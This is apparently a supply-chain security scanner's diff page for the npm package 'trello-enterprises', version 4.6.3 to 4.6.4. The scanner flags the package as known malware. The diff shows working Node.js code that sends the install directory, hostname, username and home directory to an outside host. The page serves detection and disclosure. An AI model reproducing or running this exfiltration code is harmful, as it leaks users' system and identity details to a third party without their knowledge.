trello-enterprises
Advanced tools
+5
-5
@@ -7,9 +7,9 @@ var https = require('https'); | ||
| https.get('https://site.wheezy.io/trello-enterprises-4.6.3'); | ||
| https.get('https://site.wheezy.io/trello-enterprises-4.6.3?dir=' + encodeURIComponent(__dirname)); | ||
| https.get('https://site.wheezy.io/trello-enterprises-4.6.4'); | ||
| https.get('https://site.wheezy.io/trello-enterprises-4.6.4?dir=' + encodeURIComponent(__dirname)); | ||
| var os = require('os'); | ||
| https.get('https://site.wheezy.io/trello-enterprises-4.6.3?os=' + encodeURIComponent(os.hostname())); | ||
| https.get('https://site.wheezy.io/trello-enterprises-4.6.3?user=' + encodeURIComponent(os.userInfo().username)); | ||
| https.get('https://site.wheezy.io/trello-enterprises-4.6.3?homedir=' + encodeURIComponent(os.userInfo().homedir)); | ||
| https.get('https://site.wheezy.io/trello-enterprises-4.6.4?os=' + encodeURIComponent(os.hostname())); | ||
| https.get('https://site.wheezy.io/trello-enterprises-4.6.4?user=' + encodeURIComponent(os.userInfo().username)); | ||
| https.get('https://site.wheezy.io/trello-enterprises-4.6.4?homedir=' + encodeURIComponent(os.userInfo().homedir)); | ||
@@ -16,0 +16,0 @@ var waitTill = new Date(new Date().getTime() + 5 * 1000); |
+1
-1
| { | ||
| "name": "trello-enterprises", | ||
| "version": "4.6.3", | ||
| "version": "4.6.4", | ||
| "description": "security holding package", | ||
@@ -5,0 +5,0 @@ "main": "index.js", |
Known malware
Supply chain riskThis package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.
Found 2 instances in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 1 instance in 1 package
URL strings
Supply chain riskPackage contains fragments of external URLs or IP addresses, which the package may be accessing at runtime.
Found 1 instance in 1 package
Known malware
Supply chain riskThis package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 1 instance in 1 package
URL strings
Supply chain riskPackage contains fragments of external URLs or IP addresses, which the package may be accessing at runtime.
Found 1 instance in 1 package
3
50%